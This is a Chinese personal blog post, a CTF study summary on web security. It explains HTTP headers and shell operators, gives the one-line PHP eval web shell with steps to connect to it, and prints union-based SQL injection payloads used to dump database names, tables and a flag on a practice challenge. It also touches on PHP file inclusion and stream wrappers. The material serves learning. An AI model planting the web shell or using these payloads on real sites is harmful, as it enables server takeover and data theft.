<!DOCTYPE html>
<html lang="zh-hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"su29029.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="复习一些旧的，学习一些新的。">
<meta property="og:type" content="article">
<meta property="og:title" content="20200313学习总结">
<meta property="og:url" content="https://su29029.github.io/2020/08/28/20200313%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="su29029的博客">
<meta property="og:description" content="复习一些旧的，学习一些新的。">
<meta property="og:locale">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结1.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结2.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结3.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结4.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结5.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结6.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结7.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结8.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结9.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结10.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结11.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结12.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结13.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结14.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结15.jpg">
<meta property="og:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结16.jpg">
<meta property="article:published_time" content="2020-08-28T02:33:12.000Z">
<meta property="article:modified_time" content="2020-08-28T09:06:40.958Z">
<meta property="article:author" content="su29029">
<meta property="article:tag" content="web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://su29029.github.io/images/img/20200313学习总结/20200313学习总结1.jpg">

<link rel="canonical" href="https://su29029.github.io/2020/08/28/20200313%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-hans'
  };
</script>

  <title>20200313学习总结 | su29029的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">su29029的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">因为心在那里</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-hans">
    <link itemprop="mainEntityOfPage" href="https://su29029.github.io/2020/08/28/20200313%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="su29029">
      <meta itemprop="description" content="因为心在那里">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="su29029的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          20200313学习总结
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-08-28 10:33:12 / Modified: 17:06:40" itemprop="dateCreated datePublished" datetime="2020-08-28T10:33:12+08:00">2020-08-28</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index"><span itemprop="name">web</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">web安全</span></a>
                </span>
            </span>

          
            <span id="/2020/08/28/20200313%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" class="post-meta-item leancloud_visitors" data-flag-title="20200313学习总结" title="Views">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2020/08/28/20200313%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/08/28/20200313%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" itemprop="commentCount"></span>
    </a>
  </span>
  
  <br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>8.3k字</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>8 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>复习一些旧的，学习一些新的。   </p>
<a id="more"></a>
<h3 id="0x01复习一些学过的内容"><a href="#0x01复习一些学过的内容" class="headerlink" title="0x01复习一些学过的内容"></a>0x01复习一些学过的内容</h3><h4 id="http请求头"><a href="#http请求头" class="headerlink" title="http请求头"></a>http请求头</h4><p><strong>http请求头基本格式</strong><br>一个真实的http请求报文结构如下所示：  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;check.php HTTP&#x2F;1.1</span><br><span class="line">Host: 111.198.29.45:50839</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko&#x2F;20100101 Firefox&#x2F;74.0</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,*&#x2F;*;q&#x3D;0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.8,zh-TW;q&#x3D;0.7,zh-HK;q&#x3D;0.5,en-US;q&#x3D;0.3,en;q&#x3D;0.2</span><br><span class="line">Referer:111.198.29.45:50839</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: keep-alive</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Cache-Control: max-age&#x3D;0</span><br><span class="line"></span><br><span class="line">a&#x3D;123&amp;b&#x3D;456</span><br></pre></td></tr></table></figure>
<p>解析：<br>http请求可分为三部分：请求行、请求头、请求体<br>第一行即为请求行，组成为<code>请求方法 空格 请求地址 空格 协议版本</code>，请求方法即GET POST PUT DELETE OPTION等，请求地址为请求资源路径，’/index.php’意为<code>http://111.198.29.45:50839/index.php</code>，协议版本即使用的http协议版本，1.0或1.1<br>第2-10行为请求头，即header，请求头指定了该http请求的一些基本信息，常用的请求头类型有：  </p>
<table>
<thead>
<tr>
<th>Header</th>
<th>解释</th>
<th>示例</th>
</tr>
</thead>
<tbody><tr>
<td>Accept</td>
<td>指定客户端能够接收的内容类型</td>
<td><code>Accept: text/plain,text/html,application/json</code></td>
</tr>
<tr>
<td>Accept-Charset</td>
<td>浏览器可以接受的字符编码集</td>
<td><code>Accept-Charset: iso-8859-5</code></td>
</tr>
<tr>
<td>Accept-Encoding</td>
<td>指定浏览器可支持的web服务器返回内容压缩编码类型</td>
<td><code>Accept-Encoding:compress,gzip</code></td>
</tr>
<tr>
<td>Cache-Control</td>
<td>指定请求和响应遵循的缓存机制</td>
<td><code>Cache-Control: no-cache</code></td>
</tr>
<tr>
<td>Connection</td>
<td>表示是否需要持久连接</td>
<td><code>Connection: close</code></td>
</tr>
<tr>
<td>Cookie</td>
<td>http请求发送时会把保存在该请求域名下的所有cookie一起发送给web服务器</td>
<td><code>Cookie:user=123;auth=admin;</code></td>
</tr>
<tr>
<td>Content-Length</td>
<td>请求内容长度</td>
<td><code>Content-Length: 345</code></td>
</tr>
<tr>
<td>Content-Type</td>
<td>请求的与实体对应的MIME信息</td>
<td><code>Content-Type: application/x-www-form/urlencoded</code></td>
</tr>
<tr>
<td>Date</td>
<td>请求发送时间</td>
<td><code>Date: Tue,15 Feb 2020 10:10:45 GMT</code></td>
</tr>
<tr>
<td>User-Agent</td>
<td>包含发出请求的用户信息，例如浏览器，操作系统等</td>
<td><code>User-Agent: Mozilla/5.0 (Linux;X11)</code></td>
</tr>
<tr>
<td><strong>Host</strong></td>
<td><strong>指定请求的服务器的域名和端口号</strong></td>
<td><strong><code>Host:www.abc123.com</code></strong></td>
</tr>
<tr>
<td><strong>Referer</strong></td>
<td><strong>请求来路</strong></td>
<td><strong><code>Referer: http://abc123.com/1.php</code></strong></td>
</tr>
<tr>
<td><strong>X-Forwarded-For</strong></td>
<td><strong>用户的真实ip地址</strong></td>
<td><strong><code>X-Forwarded-For: 123.123.123.123</code></strong></td>
</tr>
</tbody></table>
<p>第11行为空行，将请求头和请求体分开<br>第12行即请求体，请求体中包含查询字符串等信息  </p>
<h4 id="shell重定向，-、-amp-、-和-amp-amp-的区别"><a href="#shell重定向，-、-amp-、-和-amp-amp-的区别" class="headerlink" title="shell重定向，| 、&amp; 、|| 和 &amp;&amp; 的区别"></a>shell重定向，| 、&amp; 、|| 和 &amp;&amp; 的区别</h4><p><strong>重定向输出 ‘&gt;’</strong><br>command &gt; file<br>将command的输出写入file中，如果file文件存在，则覆盖文件内容写入，如果不存在，则创建文件。<br>command &gt;&gt; file<br>将command的输入追加到file文件的末尾。<br><strong>重定向输入 ‘&lt;’</strong><br>command &lt; file<br>将标准输入流从键盘重定向到file文件。<br><strong>管道命令 ‘|’ **<br>command1 | command2<br>将command1的stdout作为command2的stdin。<br>**后台运行进程 ‘&amp;’</strong><br>command &amp;<br>将command置于后台运行<br>** ‘||’ 和 ‘&amp;&amp;’ **<br>command1 || command2 当command1未被正确执行时，才会执行command2，否则command2不执行。<br>command1 &amp;&amp; command2 当command1被正确执行时，才会执行command2，否则command2不执行。  </p>
<h4 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h4><p>一句话木马：一句话木马就是一段简单的代码，就这短短的一行代码，就能做到和大马相当的功能。<br>代码：<code>&lt;?php eval($_POST[&#39;shell&#39;]);?&gt;</code><br>这段代码的意思很简单，执行通过POST获取到的内容。例如，我们创建一个文件，名字叫shell.php,里面写入这段代码，保存，随后通过浏览器访问/shell.php，同时通过POST传入要执行的命令，例如phpinfo，发现phpinfo被执行了。<br><img src="/images/img/20200313学习总结/20200313学习总结1.jpg"><br>我们也可以通过蚁剑来连接，在蚁剑中新建连接，地址栏输入[ip]:[port]/shell.php,密码输入shell，点击连接，发现我们直接连接上了服务器，实现了getshell的操作。  </p>
<h4 id="sql联合查询注入-无过滤"><a href="#sql联合查询注入-无过滤" class="headerlink" title="sql联合查询注入[无过滤]"></a>sql联合查询注入[无过滤]</h4><p>sql注入的原理：通过精心构造的payload，插入到原sql语句中，改变原sql语句的逻辑，从而实现攻击者想实现的操作。<br>这里回顾一下sql联合查询注入的操作。联合查询注入的前提是，页面上有显示位。所谓显示位即在一个网站的正常页面，服务端执行SQL语句查询数据库中的数据，客户端将数据展示在页面中，这个展示数据的位置就是显示位。<br>用一个题来举例子。<br>题目来源：<a target="_blank" rel="noopener" href="https://adworld.xctf.org.cn/task/answer?type=web&amp;number=3&amp;grade=1&amp;id=4686&amp;page=1">https://adworld.xctf.org.cn/task/answer?type=web&amp;number=3&amp;grade=1&amp;id=4686&amp;page=1</a><br><img src="/images/img/20200313学习总结/20200313学习总结2.jpg"><br>拿到题目，发现search框输入<code>&#39;</code>(单引号)会500响应，初步判断存在sql注入。<br><img src="/images/img/20200313学习总结/20200313学习总结3.jpg"><br>判断一下sql语句拼接方式。<br><img src="/images/img/20200313学习总结/20200313学习总结4.jpg"><br>下一步开始注入，先判断列数。<br><img src="/images/img/20200313学习总结/20200313学习总结5.jpg"><br>发现输入order by 3#有回显，而order by 4#则500响应，判断列数为3.<br>下一步开始逐步爆库，爆表，爆列。  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;or &#39;1&#39;&#x3D;&#39;1&#39; union select 1,(select group_concat(schema_name) from information_schema.schemata),3#</span><br></pre></td></tr></table></figure>
<img src="/images/img/20200313学习总结/20200313学习总结6.jpg">  
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;or &#39;1&#39;&#x3D;&#39;1&#39; union select 1,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;&#39;news&#39;),3#</span><br></pre></td></tr></table></figure>
<img src="/images/img/20200313学习总结/20200313学习总结7.jpg">  
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;or &#39;1&#39;&#x3D;&#39;1&#39; union select 1,(select group_concat(column_name) from information_schema.columns where table_schema&#x3D;&#39;news&#39; and table_name&#x3D;&#39;secret_table&#39;),3#</span><br></pre></td></tr></table></figure>
<img src="/images/img/20200313学习总结/20200313学习总结8.jpg">  
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;or &#39;1&#39;&#x3D;&#39;1&#39; union select 1,(select fl4g from secret_table),3#</span><br></pre></td></tr></table></figure>
<img src="/images/img/20200313学习总结/20200313学习总结9.jpg">  
### 0x02一些新学的
#### php文件包含
php的include命令会首先检测include的文件是否存在，如果存在则执行该文件。以一个题为例：  
题目来源：https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=5415&page=1  
拿到题目可以看出是代码审计，获取hello和page参数，其中如果page参数中含有```php://```字样则会过滤。本题思路就是利用php的文件包含特性来实现代码执行。  
<img src="/images/img/20200313学习总结/20200313学习总结10.jpg">  
<img src="/images/img/20200313学习总结/20200313学习总结11.jpg">  
<img src="/images/img/20200313学习总结/20200313学习总结12.jpg">  
<img src="/images/img/20200313学习总结/20200313学习总结13.jpg">  
#### php data伪协议
还是上面那个题，除了通过文件包含，还可以利用php的data伪协议来读取文件。  
<img src="/images/img/20200313学习总结/20200313学习总结14.jpg">  
<img src="/images/img/20200313学习总结/20200313学习总结15.jpg">  
当然这个题也可以通过大小写绕过来实现使用```php://filter```伪协议完成文件内容读取。最后base64解码即可。  
<img src="/images/img/20200313学习总结/20200313学习总结16.jpg">  
#### .phps源代码文件
.phps为php的源代码文件，通常在题目页面无提示时，可以结合题目提示来考虑是否存在源代码泄露，然后可以尝试读取.phps。  

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag"># web安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/08/28/%E4%BD%BF%E7%94%A8C%E8%AF%AD%E8%A8%80%E6%A8%A1%E6%8B%9Fjs%E5%89%8D%E5%90%8E%E7%AB%AF%E4%BA%A4%E4%BA%92/" rel="prev" title="使用C语言模拟js前后端交互">
      <i class="fa fa-chevron-left"></i> 使用C语言模拟js前后端交互
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/08/28/20200315%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" rel="next" title="20200315学习总结">
      20200315学习总结 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01%E5%A4%8D%E4%B9%A0%E4%B8%80%E4%BA%9B%E5%AD%A6%E8%BF%87%E7%9A%84%E5%86%85%E5%AE%B9"><span class="nav-number">1.</span> <span class="nav-text">0x01复习一些学过的内容</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#http%E8%AF%B7%E6%B1%82%E5%A4%B4"><span class="nav-number">1.1.</span> <span class="nav-text">http请求头</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#shell%E9%87%8D%E5%AE%9A%E5%90%91%EF%BC%8C-%E3%80%81-amp-%E3%80%81-%E5%92%8C-amp-amp-%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="nav-number">1.2.</span> <span class="nav-text">shell重定向，| 、&amp; 、|| 和 &amp;&amp; 的区别</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC"><span class="nav-number">1.3.</span> <span class="nav-text">一句话木马</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#sql%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5-%E6%97%A0%E8%BF%87%E6%BB%A4"><span class="nav-number">1.4.</span> <span class="nav-text">sql联合查询注入[无过滤]</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="su29029"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">su29029</p>
  <div class="site-description" itemprop="description">因为心在那里</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">36</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/su29029" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;su29029" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:suyouqi29029@gmail.com" title="E-Mail → mailto:suyouqi29029@gmail.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">su29029</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">NaN:aN</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'avgOqaNA0MUU2UDrqoigHt2x-gzGzoHsz',
      appKey     : 'h482kh5MdsMAOaHP6IhmXaGV',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
